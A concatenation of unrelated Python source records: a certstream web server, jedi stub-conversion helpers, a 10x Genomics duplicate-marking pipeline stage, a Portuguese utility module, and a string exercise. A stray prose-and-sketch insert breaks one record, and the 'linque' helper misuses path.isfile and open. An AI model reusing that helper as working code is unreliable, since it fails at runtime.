{\n \"messages\": list(self.recently_seen)\n },\n indent=4\n ),\n 
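The fan-out in mux_ctl_stream above (one producer copying each message onto a per-client asyncio.Queue) works independently of aiohttp; this standalone sketch uses hypothetical names and a None sentinel for shutdown:

import asyncio

async def producer(queues):
    # Push a few messages to every subscriber queue, then a stop sentinel.
    for i in range(3):
        for q in queues:
            await q.put({"message_type": "certificate_update", "data": i})
    for q in queues:
        await q.put(None)

async def consumer(name, q):
    # Drain the private queue until the sentinel arrives.
    while True:
        msg = await q.get()
        if msg is None:
            break
        print(name, "received", msg)

async def main():
    queues = [asyncio.Queue() for _ in range(2)]
    await asyncio.gather(producer(queues),
                         *(consumer(f"client-{i}", q) for i, q in enumerate(queues)))

asyncio.run(main())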
headers={\"Access-Control-Allow-Origin\": \"*\"},\n content_type=\"application/json\",\n )\n\n async def example_json_handler(self, _):\n if self.recently_seen:\n return web.Response(\n body=json.dumps(list(self.recently_seen)[0], indent=4),\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n content_type=\"application/json\",\n )\n else:\n return web.Response(\n body=\"{}\",\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n content_type=\"application/json\"\n )\n\n async def stats_handler(self, _):\n clients = {}\n for client in self.active_sockets:\n client_identifier = \"{}-{}\".format(client.external_ip, client.connection_time)\n clients[client_identifier] = {\n \"ip_address\": client.external_ip,\n \"conection_time\": client.connection_time,\n \"connection_length\": pretty_date(client.connection_time),\n \"channel\": client.channel\n }\n\n return web.Response(\n body=json.dumps({\n \"connected_client_count\": len(self.active_sockets),\n \"clients\": clients\n }, indent=4\n ),\n content_type=\"application/json\",\n )\n\n async def ws_heartbeats(self):\n self.logger.info(\"Starting WS heartbeat coro...\")\n while True:\n await asyncio.sleep(10)\n self.logger.debug(\"Sending ping...\")\n timestamp = time.time()\n for client in self.active_sockets:\n await client.queue.put({\n \"message_type\": \"heartbeat\",\n \"timestamp\": timestamp\n })\n\nif __name__ == \"__main__\":\n from certstream.watcher import TransparencyWatcher\n loop = asyncio.get_event_loop()\n watcher = TransparencyWatcher(loop)\n webserver = WebServer(loop, watcher)\n asyncio.ensure_future(asyncio.gather(*watcher.get_tasks()))\n webserver.run_server()\n","sub_path":"certstream/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"215735316","text":"from jedi import debug\nfrom jedi.evaluate.base_context import ContextSet, \\\n NO_CONTEXTS\nfrom jedi.evaluate.utils import to_list\nfrom jedi.evaluate.gradual.stub_context import StubModuleContext\n\n\ndef stub_to_actual_context_set(stub_context, ignore_compiled=False):\n stub_module = stub_context.get_root_context()\n if not stub_module.is_stub():\n return ContextSet([stub_context])\n\n was_instance = stub_context.is_instance()\n if was_instance:\n stub_context = stub_context.py__class__()\n\n qualified_names = stub_context.get_qualified_names()\n if qualified_names is None:\n return NO_CONTEXTS\n\n was_bound_method = stub_context.is_bound_method()\n if was_bound_method:\n # Infer the object first. 
We can infer the method later.\n method_name = qualified_names[-1]\n qualified_names = qualified_names[:-1]\n was_instance = True\n\n contexts = _infer_from_stub(stub_module, qualified_names, ignore_compiled)\n if was_instance:\n contexts = ContextSet.from_sets(\n c.execute_evaluated()\n for c in contexts\n if c.is_class()\n )\n if was_bound_method:\n # Now that the instance has been properly created, we can simply get\n # the method.\n contexts = contexts.py__getattribute__(method_name)\n return contexts\n\n\ndef _infer_from_stub(stub_module, qualified_names, ignore_compiled):\n assert isinstance(stub_module, StubModuleContext), stub_module\n non_stubs = stub_module.non_stub_context_set\n if ignore_compiled:\n non_stubs = non_stubs.filter(lambda c: not c.is_compiled())\n for name in qualified_names:\n non_stubs = non_stubs.py__getattribute__(name)\n return non_stubs\n\n\ndef try_stubs_to_actual_context_set(stub_contexts, prefer_stub_to_compiled=False):\n contexts = ContextSet.from_sets(\n stub_to_actual_context_set(stub_context, ignore_compiled=prefer_stub_to_compiled)\n or ContextSet([stub_context])\n for stub_context in stub_contexts\n )\n debug.dbg('Stubs to actual: %s to %s', stub_contexts, contexts)\n return contexts\n\n\n@to_list\ndef try_stub_to_actual_names(names, prefer_stub_to_compiled=False):\n for name in names:\n module = name.get_root_context()\n if not module.is_stub():\n yield name\n continue\n\n name_list = name.get_qualified_names()\n if name_list is None:\n contexts = NO_CONTEXTS\n else:\n contexts = _infer_from_stub(\n module,\n name_list[:-1],\n ignore_compiled=prefer_stub_to_compiled,\n )\n if contexts and name_list:\n new_names = contexts.py__getattribute__(name_list[-1], is_goto=True)\n for new_name in new_names:\n yield new_name\n if new_names:\n continue\n elif contexts:\n for c in contexts:\n yield c.name\n continue\n # This is the part where if we haven't found anything, just return the\n # stub name.\n yield name\n\n\ndef _load_stub_module(module):\n if module.is_stub():\n return module\n from jedi.evaluate.gradual.typeshed import _try_to_load_stub_cached\n return _try_to_load_stub_cached(\n module.evaluator,\n import_names=module.string_names,\n actual_context_set=ContextSet([module]),\n parent_module_context=None,\n sys_path=module.evaluator.get_sys_path(),\n )\n\n\ndef name_to_stub(name):\n return ContextSet.from_sets(to_stub(c) for c in name.infer())\n\n\ndef to_stub(context):\n if context.is_stub():\n return ContextSet([context])\n\n was_instance = context.is_instance()\n if was_instance:\n context = context.py__class__()\n\n qualified_names = context.get_qualified_names()\n stub_module = _load_stub_module(context.get_root_context())\n if stub_module is None or qualified_names is None:\n return NO_CONTEXTS\n\n was_bound_method = context.is_bound_method()\n if was_bound_method:\n # Infer the object first. 
We can infer the method later.\n method_name = qualified_names[-1]\n qualified_names = qualified_names[:-1]\n was_instance = True\n\n stub_contexts = ContextSet([stub_module])\n for name in qualified_names:\n stub_contexts = stub_contexts.py__getattribute__(name)\n\n if was_instance:\n stub_contexts = ContextSet.from_sets(\n c.execute_evaluated()\n for c in stub_contexts\n if c.is_class()\n )\n if was_bound_method:\n # Now that the instance has been properly created, we can simply get\n # the method.\n stub_contexts = stub_contexts.py__getattribute__(method_name)\n return stub_contexts\n","sub_path":"jedi/evaluate/gradual/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"104932602","text":"\"\"\"\nCopyright (c) 2019 10x Genomics, Inc. All rights reserved.\n\nMark PCR duplicates in a BAM file\n\"\"\"\nfrom __future__ import division\n\nimport itertools\nimport json\nimport math\nimport os\nimport numpy as np\nimport martian\nimport pickle\nimport pysam\nimport tenkit.bam as tk_bam\nimport tenkit.lane as tk_lane\nfrom barcodes import get_read_barcode, load_barcode_whitelist, whitelist_mem_gb\nfrom tools import ReferenceManager, create_bam_infile\nfrom tools.io import index_bam, hierarchical_merge_bam, sort_bam, sort_bed, merge_keyed_bed\nfrom tools.peaks import adjusted_position_pairs, is_chimeric_fragment\nfrom collections import namedtuple, Counter\nfrom constants import (SELF_FIVE_PRIME_POS_TAG, MATE_FIVE_PRIME_POS_TAG, LOW_MAPQ_THRESHOLD,\n MATE_MAPPING_QUALITY_TAG, NO_BARCODE, TENX_PRODUCT_NAME)\n\n__MRO__ = \"\"\"\nstage MARK_DUPLICATES(\n in bam input,\n in string reference_path,\n in json raw_barcode_counts,\n in string barcode_whitelist,\n out bam output,\n out bam.bai index,\n out csv singlecell_mapping,\n out tsv.gz fragments,\n out tsv.gz.tbi fragments_index,\n src py \"stages/processing/mark_duplicates\",\n) split (\n in map lane_map,\n in string chunk_start,\n in string chunk_end,\n in int chunk_num,\n)\n\"\"\"\n\n# For optical duplicate detection\nOPTICAL_DUPLICATE_DISTANCE = 100\n\n# For diffusion duplicate detection, max distance over which diffusion is expected\nMAX_DIFFUSION_DUP_DISTANCE = 25e3\n\nSINGLE_CELL_KEYS = [\"total\", \"duplicate\", \"chimeric\", \"unmapped\",\n \"lowmapq\", \"mitochondrial\", \"passed_filters\"]\n\nReadFootprint = namedtuple(\"ReadFootprint\", [\"barcode\", \"ref_id\", \"position\", \"mate_ref_id\", \"mate_position\"])\nNamedRead = namedtuple(\"NamedRead\", [\"footprint\", \"barcode\", \"read\"])\n\n\n# Generator utilities -- move to tenkit?\ndef consumer(func):\n \"\"\" decorator for initializing a generator consumer function \"\"\"\n\n def start(*args, **kwargs):\n c = func(*args, **kwargs)\n c.next()\n return c\n\n return start\n\n\ndef broadcast(source, consumers):\n \"\"\" send each item in the source generator to each consumer in the list \"\"\"\n for item in source:\n for c in consumers:\n c.send(item)\n\n for c in consumers:\n c.close()\n\n\ndef chunk_bound_func(read):\n if not read.is_unmapped:\n return read.reference_id, read.get_tag(SELF_FIVE_PRIME_POS_TAG)\n else:\n return None\n\n\nclass DupSummary:\n def __init__(self, split_bcs, lane_coordinate_system, output_bam, output_tsv,\n ref, bam_refs, priors=None, write_to_stdout=False):\n \"\"\" Summarize dups at a given subsampling rate, and barcode\n splitting policy. 
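_infer_from_stub above resolves a tuple of qualified names one attribute at a time against a module; the same walk on a plain Python module looks like this generic sketch (not jedi's API):

import functools
import os

def resolve_qualified(obj, qualified_names):
    # Follow each name segment with getattr, e.g. ("path", "join") on os.
    return functools.reduce(getattr, qualified_names, obj)

assert resolve_qualified(os, ("path", "join")) is os.path.join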
If an open output_bam pysam.Samfile\n is passed, dups will be marked and reads will be written\n to output_bam \"\"\"\n self.split_bcs = split_bcs\n if output_bam is None or output_tsv is None:\n raise ValueError(\"Must provide valid output paths\")\n\n self.output_bam = output_bam\n self.output_tsv = output_tsv\n self.primary_contigs = ref.primary_contigs(allow_sex_chromosomes=True)\n self.mito_contigs = ref.non_nuclear_contigs()\n self.contig_lookup = bam_refs\n self.write_to_stdout = write_to_stdout\n self.bc_counts = {}\n self.contig_lengths = ref.get_contig_lengths()\n\n self.lane_coordinate_system = lane_coordinate_system\n\n # This is the raw counts of reads per barcode, used to discriminate when assigning a dupgroup to a barcode\n self.priors = priors\n\n def count_dups_by_distance(self, namedreads):\n \"\"\"Count number of nearby duplicates in a set of reads. A pair is counted as 1\"\"\"\n # Get (flowcell, lane, surface, swath, tile, x, y) tuples for each read\n read_locs = []\n for (footprint, barcode, read) in namedreads:\n read_loc = tk_lane.extract_read_position(read)\n if read_loc is not None:\n read_locs.append((read_loc, read))\n\n # Sort by flowcell_lane\n def flowcell_lane(read_loc):\n return \"%s_%s\" % (read_loc[0].flowcell, read_loc[0].lane)\n\n read_locs.sort(key=flowcell_lane)\n lane_groups = itertools.groupby(read_locs, flowcell_lane)\n\n opt_dups_found = 0 # really close dupes\n diff_dups_found = 0 # somewhat close dupes\n\n # Measure distances between all pairs in a lane\n for (lane, lane_reads) in lane_groups:\n lane_reads = list(lane_reads)\n\n layout = self.lane_coordinate_system.get_layout_for_read_loc(lane_reads[0][0])\n test_dups = layout.has_diffusion_duplicates(MAX_DIFFUSION_DUP_DISTANCE)\n\n if len(lane_reads) > 100:\n martian.log_info(\"Got dup cluster of size: %d\" % len(lane_reads))\n first_read = lane_reads[0][1]\n martian.log_info(\"tid: %d, pos: %d, mapq: %d, seq: %s\" % (\n first_read.reference_id, first_read.reference_start, first_read.mapping_quality,\n first_read.query_sequence))\n\n opt_dups = set()\n diff_dups = set()\n dump = []\n cmp_reads = min(200, len(lane_reads))\n lane_loc_coords = [self.lane_coordinate_system.convert_to_lane_coords(loc) for (loc, _) in lane_reads]\n for i in range(cmp_reads):\n loc1, read1 = lane_reads[i]\n lane_loc1 = lane_loc_coords[i]\n\n for j in range(i + 1, len(lane_reads)):\n loc2, read2 = lane_reads[j]\n lane_loc2 = lane_loc_coords[j]\n\n dist = math.sqrt((lane_loc1[0] - lane_loc2[0]) ** 2 + (lane_loc1[1] - lane_loc2[1]) ** 2)\n if test_dups and dist < MAX_DIFFUSION_DUP_DISTANCE:\n diff_dups.add(j)\n if self.write_to_stdout and j not in diff_dups:\n dump.append((\"%d\\t\" + (\"%d\\t\" * 14)) % (dist,\n loc1.surface, loc1.swath, loc1.tile, loc1.x, loc1.y,\n lane_loc1[0], lane_loc1[1],\n loc2.surface, loc2.swath, loc2.tile, loc2.x, loc2.y,\n lane_loc2[0], lane_loc2[1]))\n\n if dist < OPTICAL_DUPLICATE_DISTANCE:\n opt_dups.add(j)\n\n if self.write_to_stdout and len(diff_dups) >= 2:\n for x in dump:\n print (\"%d\\t%s\" % (len(diff_dups), x))\n\n diff_dups_found += len(diff_dups)\n opt_dups_found += len(opt_dups)\n\n return opt_dups_found, diff_dups_found\n\n def process_read_block(self, reads):\n \"\"\"dedups a block of reads, then writes them to output BAM in original order \"\"\"\n read_tuples = []\n for read in reads:\n barcode = get_read_barcode(read)\n if barcode not in self.bc_counts:\n self.bc_counts[barcode] = {key: 0 for key in SINGLE_CELL_KEYS}\n\n if read.is_secondary:\n continue\n\n if read.is_unmapped 
or read.mate_is_unmapped or read.get_tag(SELF_FIVE_PRIME_POS_TAG) == read.get_tag(MATE_FIVE_PRIME_POS_TAG):\n # For unmapped pairs, key off of R1, and only report stats on R1\n read_key = read.is_read1\n else:\n # For mapped pairs, key so that the 5' most mate is primary\n read_key = read.get_tag(SELF_FIVE_PRIME_POS_TAG) < read.get_tag(MATE_FIVE_PRIME_POS_TAG)\n\n # We only need to dedup mapped pairs, but we output stats based on the read_key for consistency\n if read_key:\n self.bc_counts[barcode]['total'] += 1\n if read.is_unmapped or read.mate_is_unmapped:\n self.bc_counts[barcode]['unmapped'] += 1\n\n if read.is_unmapped or read.mate_is_unmapped:\n continue\n\n # The footprint is what we form duplicate groups out of: read barcode if split_bcs is set, and\n # read and mate contig IDs and 5' positions (as given by previously annotated tags)\n footprint = ReadFootprint(barcode if self.split_bcs else None,\n self.contig_lookup[read.reference_id], read.get_tag(SELF_FIVE_PRIME_POS_TAG),\n self.contig_lookup[read.next_reference_id], read.get_tag(MATE_FIVE_PRIME_POS_TAG))\n\n read_tuples.append(NamedRead(footprint, barcode, read))\n\n # Sort and then group by the read footprint. Note that the sort is necessary to group all reads with the\n # same footprint.\n read_tuples.sort(key=lambda x: x.footprint)\n dup_groups = itertools.groupby(read_tuples, lambda x: x.footprint)\n\n for (footprint, dup_group) in dup_groups:\n dup_group = list(dup_group)\n total_dups = len(dup_group)\n contig = footprint.ref_id\n if total_dups > 1:\n optical_dups, diffusion_dups = self.count_dups_by_distance(dup_group)\n else:\n optical_dups = 0\n diffusion_dups = 0\n non_proximal_dups = total_dups - max(diffusion_dups, optical_dups)\n\n dup_group_barcodes = Counter()\n for namedread in dup_group[:non_proximal_dups]:\n if namedread.barcode is not None:\n dup_group_barcodes[namedread.barcode] += 1\n if not dup_group_barcodes:\n most_common_barcode = None\n else:\n # Use raw read counts per barcode to break ties in determining the best barcode\n if self.priors is None:\n most_common_barcode = dup_group_barcodes.most_common(1)[0][0]\n else:\n max_count = max(dup_group_barcodes.values())\n common_barcodes = [bc for bc, count in dup_group_barcodes.iteritems()\n if count == max_count]\n most_common_barcode = max(common_barcodes, key=lambda bc: self.priors[bc])\n\n # Identify the unique duplicate out of the group as the one with the minimum query name to be consistent\n # between this dup group and its read pairs\n unique_dup_index = min([(i, dup_group[i].read.query_name) for i in range(total_dups)\n if dup_group[i].barcode == most_common_barcode], key=lambda x: x[1])[0]\n\n unique_read = dup_group[unique_dup_index].read\n\n # NOTE: this means that number of dups as per BAM tag is slightly different from number of dups counted\n # by discarding lowmapq, mito or chimeric fragments.\n for i in range(0, total_dups):\n dup_group[i].read.is_duplicate = True\n unique_read.is_duplicate = False\n\n fragment_mapq = min(unique_read.mapping_quality, unique_read.get_tag(MATE_MAPPING_QUALITY_TAG))\n primary_contigs_set = set(self.primary_contigs)\n # Make sure we only output data for one read dup group of each read pair\n equal_positions = footprint.position == footprint.mate_position\n if footprint.position <= footprint.mate_position:\n if fragment_mapq <= LOW_MAPQ_THRESHOLD:\n # Count chimerically mapped fragments with identical 5' tags for each read only once\n for read in (dup_group[i] for i in range(total_dups) if not equal_positions 
or dup_group[i].read.is_read1):\n self.bc_counts[read.barcode][\"lowmapq\"] += 1\n elif contig in self.mito_contigs:\n for read in (dup_group[i] for i in range(total_dups) if not equal_positions or dup_group[i].read.is_read1):\n self.bc_counts[read.barcode][\"mitochondrial\"] += 1\n elif is_chimeric_fragment(unique_read) or contig not in primary_contigs_set:\n # Note that we've added fragments mapping to supplementary contigs here\n for read in (dup_group[i] for i in range(total_dups) if not equal_positions or dup_group[i].read.is_read1):\n self.bc_counts[read.barcode][\"chimeric\"] += 1\n else:\n self.bc_counts[most_common_barcode][\"passed_filters\"] += 1\n for dup_read in (dup_group[i] for i in range(total_dups) if i != unique_dup_index):\n self.bc_counts[dup_read.barcode][\"duplicate\"] += 1\n if most_common_barcode is not None:\n # Write out the output fragments\n start, stop = adjusted_position_pairs(unique_read)\n if start is not None and stop is not None:\n start = max(0, start)\n stop = min(stop, self.contig_lengths[contig])\n self.output_tsv.write('{contig}\\t{start}\\t{stop}\\t'\n '{most_common_barcode}\\t'\n '{non_proximal_dups}\\n'.format(**locals()))\n\n for read in reads:\n self.output_bam.write(read)\n\n @consumer\n def read_consumer(self):\n # bam is sorted by SELF_FIVE_PRIME_POS tag, chrom and pos.\n current_bam_key = (-1, -1)\n current_reads = []\n try:\n while True:\n # accept the next read\n read = (yield)\n\n new_bam_key = (read.reference_id, read.get_tag(SELF_FIVE_PRIME_POS_TAG))\n\n # If the dup group gets extremely large we can run out of memory.\n # Process things in groups of 500K to prevent memory blow-up\n # May cause us to miss a few dups, but it doesn't really matter in these crazy regions\n if new_bam_key != current_bam_key or len(current_reads) > 500000:\n process_reads = current_reads\n current_reads = []\n current_bam_key = new_bam_key\n\n if len(process_reads) > 0:\n self.process_read_block(process_reads)\n\n # accumulate block of reads with same start position\n current_reads.append(read)\n\n except GeneratorExit:\n # Finish up final batch\n self.process_read_block(current_reads)\n return\n\n\ndef split(args):\n # Chunk bam to get 1GB per chunk\n bam_in = create_bam_infile(args.input)\n bam_chunk_size_disk = 0.75\n chunk_defs = tk_bam.chunk_bam_records(bam_in, chunk_bound_func, chunk_size_gb=bam_chunk_size_disk)\n\n for chunk in chunk_defs:\n chunk['__mem_gb'] = 4\n chunk['__vmem_gb'] = 5 + int(np.ceil(2 * whitelist_mem_gb(args.barcode_whitelist) + bam_chunk_size_disk * 10))\n\n lane_coord_sys = tk_lane.LaneCoordinateSystem()\n\n # Reopen BAM for estimating tile extents\n bam_in = create_bam_infile(args.input)\n lane_coord_sys.estimate_tile_extents(bam_in)\n for cnum, chunk in enumerate(chunk_defs):\n chunk['lane_map'] = lane_coord_sys.to_dict()\n chunk['chunk_num'] = cnum\n\n return {'chunks': chunk_defs, 'join': {'__mem_gb': 8, '__threads': 4}}\n\n\ndef join(args, outs, chunk_defs, chunk_outs):\n outs.coerce_strings()\n\n # Merge the output bam files with duplicates marked\n hierarchical_merge_bam([c.output for c in chunk_outs], outs.output, tag=None,\n threads=martian.get_threads_allocation())\n outs.index = index_bam(outs.output, martian.get_threads_allocation())\n\n # Merge the barcode counts from each chunk and write out our singlecell_mapping file\n barcode_whitelist = load_barcode_whitelist(args.barcode_whitelist, ordered=True)\n sorted_barcodes = []\n if args.raw_barcode_counts is not None:\n with open(args.raw_barcode_counts, 'r') as infile:\n 
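The dedup core above is sort-then-groupby on a footprint key, followed by a majority vote over barcodes and a deterministic pick of the surviving read; a reduced sketch with toy reads (the namedtuple fields and values are hypothetical):

import itertools
from collections import Counter, namedtuple

Read = namedtuple("Read", ["footprint", "barcode", "name"])

reads = [  # two reads share a footprint, i.e. they are duplicates
    Read(("chr1", 100, "chr1", 250), "AAAC", "r2"),
    Read(("chr1", 100, "chr1", 250), "AAAC", "r1"),
    Read(("chr1", 400, "chr1", 520), "GGTT", "r3"),
]

# groupby only merges adjacent items, so sort on the same key first.
reads.sort(key=lambda r: r.footprint)
for footprint, group in itertools.groupby(reads, key=lambda r: r.footprint):
    group = list(group)
    barcode = Counter(r.barcode for r in group).most_common(1)[0][0]
    # Keep the read with the minimum query name, as the stage above does.
    unique = min(group, key=lambda r: r.name)
    print(footprint, "->", len(group), "reads; keep", unique.name, "barcode", barcode)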
raw_counts = json.load(infile)\n sorted_barcodes = ['{}-{}'.format(barcode, gem_group)\n for gem_group in raw_counts\n for barcode in sorted(barcode_whitelist)]\n barcode_counts = {}\n for chunk in chunk_outs:\n with open(chunk.singlecell_mapping, 'r') as infile:\n chunk_counts = pickle.load(infile)\n for barcode, count_dict in chunk_counts.iteritems():\n if barcode not in barcode_counts:\n barcode_counts[barcode] = Counter()\n barcode_counts[barcode] += Counter(count_dict)\n\n with open(outs.singlecell_mapping, 'w') as outfile:\n outfile.write(\"barcode,\")\n outfile.write(\",\".join(SINGLE_CELL_KEYS))\n outfile.write(\"\\n\")\n if None in barcode_counts:\n outfile.write(\"{},\".format(NO_BARCODE))\n outfile.write(\",\".join([str(barcode_counts[None][key]) for key in SINGLE_CELL_KEYS]))\n outfile.write(\"\\n\")\n for barcode in (bc for bc in sorted_barcodes if bc in barcode_counts):\n outfile.write(\"{},\".format(barcode))\n outfile.write(\",\".join([str(barcode_counts[barcode][key]) for key in SINGLE_CELL_KEYS]))\n outfile.write(\"\\n\")\n\n # Merge the fragment file\n base_file, extension = os.path.splitext(outs.fragments)\n if not extension == '.gz':\n raise ValueError('Expecting compressed file output')\n input_tsvs = [str(chunk.fragments) for chunk in chunk_outs]\n merge_keyed_bed(input_tsvs, base_file, threads=martian.get_threads_allocation())\n if os.path.getsize(base_file) == 0:\n outs.fragments = None\n outs.fragments_index = None\n return\n\n # N.B. tabix_index will automatically compress the input file, adding the .gz suffix\n pysam.tabix_index(base_file, preset='bed', index=outs.fragments_index)\n\n\ndef main(args, outs):\n \"\"\"Mark exact duplicate reads in the output BAM file while also writing out some summary statistics.\n PCR duplicates have the same read1 start site and read2 start site.\n \"\"\"\n args.coerce_strings()\n outs.coerce_strings()\n\n # Chunk output doesn't get indexed\n outs.fragments_index = None\n outs.index = None\n\n # Pull in prior likelihoods for barcodes\n raw_barcode_abundance = None\n barcode_whitelist = load_barcode_whitelist(args.barcode_whitelist)\n if args.raw_barcode_counts is not None and barcode_whitelist is not None:\n with open(args.raw_barcode_counts, 'r') as infile:\n raw_counts = json.load(infile)\n raw_barcode_abundance = {'{}-{}'.format(barcode, gem_group): count\n for gem_group, subdict in raw_counts.iteritems()\n for barcode, count in zip(barcode_whitelist, subdict['bc_counts'])}\n\n bam_in = create_bam_infile(args.input)\n bam_refs = bam_in.references\n\n bam_prefix, ext = os.path.splitext(outs.output)\n raw_bam_file = martian.make_path(bam_prefix + '_five_prime_pos_sorted' + ext)\n\n frag_prefix, ext = os.path.splitext(outs.fragments)\n raw_frag_file = martian.make_path(frag_prefix + '_raw' + ext)\n\n # only write CO line for one chunk, so we don't have duplicates after samtools merge\n if args.chunk_num == 0:\n COs = ['10x_bam_to_fastq:R1(SEQ:QUAL,TR:TQ)',\n '10x_bam_to_fastq:R2(SEQ:QUAL,TR:TQ)',\n '10x_bam_to_fastq:I1(BC:QT)',\n '10x_bam_to_fastq:I2(CR:CY)',\n '10x_bam_to_fastq_seqnames:R1,R3,I1,R2']\n else:\n COs = None\n\n bam_out, _ = tk_bam.create_bam_outfile(raw_bam_file, None, None, template=bam_in,\n pgs=[tk_bam.make_pg_header(martian.get_pipelines_version(),\n \"mark_duplicates\",\n TENX_PRODUCT_NAME)],\n cos=COs)\n fragments_out = open(raw_frag_file, 'w')\n bam_in.reset()\n\n # Ensure the summary key indicates what kind of dup marking was actually performed.\n lane_coord_sys = 
tk_lane.LaneCoordinateSystem.from_dict(args.lane_map)\n reference_manager = ReferenceManager(args.reference_path)\n summarizer = DupSummary(split_bcs=False,\n lane_coordinate_system=lane_coord_sys,\n output_bam=bam_out,\n output_tsv=fragments_out,\n ref=reference_manager,\n bam_refs=bam_refs,\n priors=raw_barcode_abundance)\n\n # Now broadcast the selected reads to the summarizers\n consumers = [summarizer.read_consumer()]\n source = tk_bam.read_bam_chunk(bam_in, (args.chunk_start, args.chunk_end))\n broadcast(source, consumers)\n\n # Close outfiles\n bam_out.close()\n fragments_out.close()\n\n # Feed the chunk barcode_counts data back to join()\n with open(outs.singlecell_mapping, 'w') as outfile:\n pickle.dump(summarizer.bc_counts, outfile)\n\n # Sort the output bam & tsv files\n sort_bam(raw_bam_file, outs.output, threads=martian.get_threads_allocation())\n sort_bed(raw_frag_file, outs.fragments, genome=reference_manager.fasta_index,\n threads=martian.get_threads_allocation(), leave_key=True)\n","sub_path":"mro/atac/stages/processing/mark_duplicates/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":21483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"276203544","text":"from os import path, system\n\n\ndef tit(txt):\n t = int(len(txt) + 8)\n print('-' * t)\n print(f'{txt:^{t}}')\n print('-' * t)\n\n\ndef cls():\n android: bool = path.exists('/storage/emulated/0')\n windows: bool = path.exists('C:/Program Files')\n linux: bool = path.exists('/home/')\n if android or linux:\n system('clear')\n if windows:\n system('cls')\n\n\ndef limpa():\n \"\"\"\n Função que limpa a tela\n \"\"\"\n if path.isdir('C:/'):\n system('cls')\n if path.isdir('/storage/emulated/0/'):\n system('clear')\n\n\n# noinspection PyArgumentList\ndef linque(caminho, form='r', asci=True):\n \"\"\"\n Função que linca o arquivo\n :type asci: bool\n :type form: object\n :param caminho: indica o caminho do arquivo\n :param asci: leitura de códigos ascii, que\n para ativar escreva False para ele\n :return: a\n \"\"\"\n if path.isfile(caminho, form):\n return open(caminho, form, ensure_ascii=asci)\n\n\ndef pc():\n if path.isdir('C:/'):\n return 'windows'\n elif path.isdir('/storage/emulated/0/'):\n return 'android/linux'\n\n\ndef rinput(texto: object, b: object = None, enfeite: object = ':', errormsg = 'Tente novamente.'):\n \"\"\"\n Função que não para de executar input\n até que você digite alguma coisa ou\n digite a coisa correta.\n :type texto: object\n :param texto: Exibe no input\n :type b: object\n :param b: lista de condição\n :return: var c\n \"\"\"\n if b is None:\n b = False\n cont = -1\n while True:\n cont += 1\n if cont == 0:\n c = input(f'{texto}{enfeite} ')\n else:\n c = input(f'{errormsg}\\n{texto}{enfeite} ')\n if c == '':\n limpa()\n pass\n else:\n if not b:\n return str(c)\n else:\n if c in b:\n return str(c)\n else:\n pass\n","sub_path":"canivete.py","file_name":"canivete.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"484819309","text":"'''\n By: Bearded_Mucassi[lmucassi]\n Given a string, find the first non-repeating character in it and return its index.\n If it doesn't exist, return -1. 
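The function below finds the first non-repeating character by building a frequency dict in one pass and scanning in a second; an equivalent sketch with collections.Counter:

from collections import Counter

def first_uniq_char(s):
    counts = Counter(s)  # one pass to count, one pass to locate
    return next((i for i, ch in enumerate(s) if counts[ch] == 1), -1)

assert first_uniq_char("alphabet") == 1  # 'l' is the first unique character
assert first_uniq_char("aabb") == -1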
# Note: all the input strings are already lowercase.\n'''\n\ndef first_uniqchar1(c):\n frequency = {}\n for i in c:\n if i not in frequency:\n frequency[i] = 1\n else:\n frequency[i] += 1\n for i in range(len(c)):\n if frequency[c[i]] == 1:\n return i \n return -1\n\nprint(first_uniqchar1('alphabet'))\nprint(first_uniqchar1('barbados'))\nprint(first_uniqchar1('crunchy'))\n","sub_path":"string/first_unique_char/first_uniqchar1.py","file_name":"first_uniqchar1.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"116633417","text":"# coding=utf-8\n# entityscript.py\n# created on 2020/8/31\n# author @zoloypzuo\n# usage: entityscript\nimport stategraph\nfrom common.zglobal import load_script\nfrom common.zlogger import logger_tail, logger\nfrom common.ztable import Table\n\n\ndef add_listener(t, event, inst, fn):\n \"\"\"\n 事件表t的结构:\n t[event] -> listeners\n listeners[inst] -> fns\n :param t:\n :param event:\n :param inst:\n :param fn:\n :return:\n \"\"\"\n assert t is not None\n listeners = t.get(event, None)\n if not listeners:\n listeners = {}\n t[event] = listeners\n listener_fns = listeners.get(inst, None)\n if not listener_fns:\n listener_fns = []\n listeners[inst] = listener_fns\n listener_fns.append(fn)\n\n\ndef remove_listener(t, event, inst, fn):\n if not t:\n return\n listeners = t.get(event, None)\n if not listeners:\n return\n listener_fns = listeners.get(inst, None)\n if listener_fns:\n listener_fns.remove(fn)\n # 删除fn后检查其容器,如果空,删除它\n if not listener_fns:\n del listeners[inst]\n if not listeners:\n del t[event]\n\n\nclass EntityScript(object):\n \"\"\"\n Attributes:\n brain:\n brainfn:\n sg:\n event_listeners:\n event_listening:\n \"\"\"\n\n def __init__(self):\n super(EntityScript, self).__init__()\n self.tags = set()\n self.brain = None\n self.brainfn = None\n self.sg = None\n self.event_listeners = {} # 也可以由listen_for_event初始化\n self.event_listening = {}\n\n self.components = Table()\n\n # ---------------------------------------------------\n # 事件系统\n # ---------------------------------------------------\n @logger\n def push_event(self, event, data=None):\n \"\"\"\n 触发self上的事件\n :param event:\n :param data:\n :return:\n \"\"\"\n # entity\n if self.event_listeners:\n listeners = self.event_listeners.get(event, None)\n if listeners:\n # 拷贝一份回调列表,以防一些handler中listener列表被修改\n to_call = []\n for ent, fns in listeners.iteritems():\n for fn in fns:\n to_call.append(fn)\n for fn in to_call:\n fn(data) # NOTE python use bound-method, DONT pass self into fn\n\n # sg\n if self.sg and self.sg.is_listening_for_event(event) and stategraph.SGManager.on_push_event(self.sg):\n self.sg.push_event(event, data)\n\n # brain\n if self.brain:\n self.brain.push_event(event, data)\n\n def listen_for_event(self, event, fn, source=None):\n \"\"\"\n 监听者self,监听事件源的事件\n :param source:\n :param event:_\n :param fn:\n :return:\n \"\"\"\n # 